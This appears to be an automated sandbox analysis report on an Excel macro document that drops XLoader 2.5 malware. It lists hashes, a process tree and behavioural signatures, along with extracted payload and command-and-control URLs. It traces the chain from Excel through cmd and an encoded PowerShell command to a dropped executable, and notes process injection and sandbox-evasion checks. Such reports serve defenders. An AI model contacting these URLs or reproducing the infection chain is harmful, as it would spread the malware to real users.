Analysis
max time kernel: 151s
max time network: 151s
platform: windows10_x64
resource: win10-en-20211104
submitted: 17-11-2021 21:45
Static task: static1
Behavioral task: behavioral1
Sample: 6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm
Resource: win7-en-20211104
General
Target: 6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm
Size: 14KB
MD5: 70820ac2bb527bb0a10747a06d2c2b0b
SHA1: 7289b7ddcdcaa9450c27e1579f36d67a544cee80
SHA256: 6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753
SHA512: 64be67485be70ac5aa2539a88c9846282d7178e13a46895d4686ff0ce79378bf9ed4ee7bec00cb88abc0e2e8bb41a9b9ef38aa4ff25b4e4dc6334a96ad1ee4b5
Malware Config
Extracted: http://84.252.122.205/xcx/system.exe
Extracted: xloader
Version: 2.5
Campaign: pufi
URL: http://www.homestechs.com/pufi/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process | target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 2668 | 3904 | cmd.exe | EXCEL.EXE
Xloader Payload 4 IoCs
Processes:
resource | yara_rule
behavioral2/memory/1296-308-0x000000000041D450-mapping.dmp | xloader
behavioral2/memory/1296-311-0x0000000000400000-0x0000000000429000-memory.dmp | xloader
behavioral2/memory/3000-320-0x0000000003040000-0x0000000003069000-memory.dmp | xloader
behavioral2/memory/3000-323-0x0000000003070000-0x00000000031BA000-memory.dmp | xloader
Blocklisted process makes network request 1 IoCs
Processes:
flow | pid | process
29 | 1092 | powershell.exe
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
pid | process
4084 | Bexscoyaparcyhnfy.exe
1296 | Bexscoyaparcyhnfy.exe
Deletes itself 1 IoCs
Processes:
pid | process
3904 | EXCEL.EXE
Suspicious use of SetThreadContext 4 IoCs
Processes:
description | pid | process | target process
PID 4084 set thread context of 1296 | 4084 | Bexscoyaparcyhnfy.exe | Bexscoyaparcyhnfy.exe
PID 1296 set thread context of 3016 | 1296 | Bexscoyaparcyhnfy.exe | Explorer.EXE
PID 1296 set thread context of 3016 | 1296 | Bexscoyaparcyhnfy.exe | Explorer.EXE
PID 3000 set thread context of 3016 | 3000 | NETSTAT.EXE | Explorer.EXE
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
pid | process
3000 | NETSTAT.EXE
NTFS ADS 1 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Local\Temp\9CC57F00\:Zone.Identifier:$DATA | EXCEL.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
pid | process
3904 | EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 47 IoCs
Processes:
pid | process
1092 | powershell.exe (3 entries)
4084 | Bexscoyaparcyhnfy.exe (2 entries)
1296 | Bexscoyaparcyhnfy.exe (6 entries)
3000 | NETSTAT.EXE (36 entries)
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
pid | process
1296 | Bexscoyaparcyhnfy.exe (4 entries)
3000 | NETSTAT.EXE (2 entries)
Suspicious behavior: RenamesItself 1 IoCs
Processes:
pid | process
3904 | EXCEL.EXE
Suspicious use of AdjustPrivilegeToken 42 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 1092 | powershell.exe
Token: SeDebugPrivilege | 4084 | Bexscoyaparcyhnfy.exe
Token: SeDebugPrivilege | 1296 | Bexscoyaparcyhnfy.exe
Token: SeDebugPrivilege | 3000 | NETSTAT.EXE
Token: SeShutdownPrivilege | 3016 | Explorer.EXE (19 entries, alternating with the row below)
Token: SeCreatePagefilePrivilege | 3016 | Explorer.EXE (19 entries)
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
pid | process
3904 | EXCEL.EXE (12 entries)
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
description | pid | process | target process
PID 3904 wrote to memory of 2668 | 3904 | EXCEL.EXE | cmd.exe (2 entries)
PID 2668 wrote to memory of 1092 | 2668 | cmd.exe | powershell.exe (2 entries)
PID 1092 wrote to memory of 4084 | 1092 | powershell.exe | Bexscoyaparcyhnfy.exe (3 entries)
PID 4084 wrote to memory of 1296 | 4084 | Bexscoyaparcyhnfy.exe | Bexscoyaparcyhnfy.exe (6 entries)
PID 3016 wrote to memory of 3000 | 3016 | Explorer.EXE | NETSTAT.EXE (3 entries)
PID 3000 wrote to memory of 1612 | 3000 | NETSTAT.EXE | cmd.exe (3 entries)
Processes
- C:\Windows\Explorer.EXE
  Command line: C:\Windows\Explorer.EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\6ffda0323b69bb875a8360bcdd18b398a463d3de88bb11e6511a3b3bffe5b753.xlsm"
    - Deletes itself
    - Checks processor information in registry
    - Enumerates system info in registry
    - NTFS ADS
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: RenamesItself
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Cxrgbutjpc.bat
      - Process spawned unexpected child process
      - Suspicious use of WriteProcessMemory
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc 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
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        - C:\Users\Admin\AppData\Roaming\Bexscoyaparcyhnfy.exe
          Command line: "C:\Users\Admin\AppData\Roaming\Bexscoyaparcyhnfy.exe"
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          - C:\Users\Admin\AppData\Local\Temp\Bexscoyaparcyhnfy.exe
            Command line: C:\Users\Admin\AppData\Local\Temp\Bexscoyaparcyhnfy.exe
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious behavior: MapViewOfSection
            - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\NETSTAT.EXE
    Command line: "C:\Windows\SysWOW64\NETSTAT.EXE"
    - Suspicious use of SetThreadContext
    - Gathers network information
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe
      Command line: /c del "C:\Users\Admin\AppData\Local\Temp\Bexscoyaparcyhnfy.exe"
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\Bexscoyaparcyhnfy.exe
  MD5: 1784e74e8dd172731e715668f905639b
  SHA1: 8f180642955070583837e55fa3c5677c059a1e3c
  SHA256: ad6eba8fb34f6e35f73fc65c58ed19e6648604247dc8a6e1c7db9156553dd77f
  SHA512: 786e1bb8832dbe875a4bcf7fa1ccb0f0ce1127e3049fd31d3a3c707c54f8531e52c5ef5a9f449a35e8c8982325e307ef772feb8fa133b755e55d3ea1b987f36b
- C:\Users\Admin\AppData\Roaming\Bexscoyaparcyhnfy.exe
  MD5: 1784e74e8dd172731e715668f905639b
  SHA1: 8f180642955070583837e55fa3c5677c059a1e3c
  SHA256: ad6eba8fb34f6e35f73fc65c58ed19e6648604247dc8a6e1c7db9156553dd77f
  SHA512: 786e1bb8832dbe875a4bcf7fa1ccb0f0ce1127e3049fd31d3a3c707c54f8531e52c5ef5a9f449a35e8c8982325e307ef772feb8fa133b755e55d3ea1b987f36b
- C:\Users\Admin\Documents\Cxrgbutjpc.bat
  MD5: 31814477e987cc1e94638caa7f39f293
  SHA1: c3814edcc331117303ced19f53006a4ecd09a833
  SHA256: de24fa627ca42edfb1e5b46804f6dd0ed41fbcbd900eeeb56abc5cb34c1cadd4
  SHA512: 09a06a533d82dc086c345bd1c5ca92b2d582964c963b89e6e0c11c784effe9e4ecfc5e05f2bd3571437a04bead7c2d9fc053bd82538be17a23a473dc949fc268